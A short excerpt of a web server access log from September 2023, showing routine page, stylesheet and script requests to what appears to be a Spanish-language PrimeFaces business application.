191.156.184.46 - - [08/Sep/2023:14:15:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.186.3 - - [08/Sep/2023:14:15:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.46 - - [08/Sep/2023:14:15:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.30 - - [08/Sep/2023:14:15:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.77 - - [08/Sep/2023:14:15:14 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 153848
216.245.221.92 - - [08/Sep/2023:14:15:27 -0500] "HEAD / HTTP/1.1" 200 -
191.156.176.63 - - [08/Sep/2023:14:15:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 15776
191.156.178.226 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.184.30 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.178.226 - - [08/Sep/2023:14:15:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 21124
191.156.184.30 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.178.226 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.190.21 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.190.21 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.30 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.178.226 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.30 - - [08/Sep/2023:14:15:45 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [08/Sep/2023:14:14:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Sep/2023:14:16:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [08/Sep/2023:14:16:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42865
191.156.177.181 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.184.46 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.177.181 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.178.226 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [08/Sep/2023:14:14:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
191.156.177.181 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.77 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.46 - - [08/Sep/2023:14:16:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.178.226 - - [08/Sep/2023:14:15:55 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 155676
191.156.178.226 - - [08/Sep/2023:14:16:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 21124
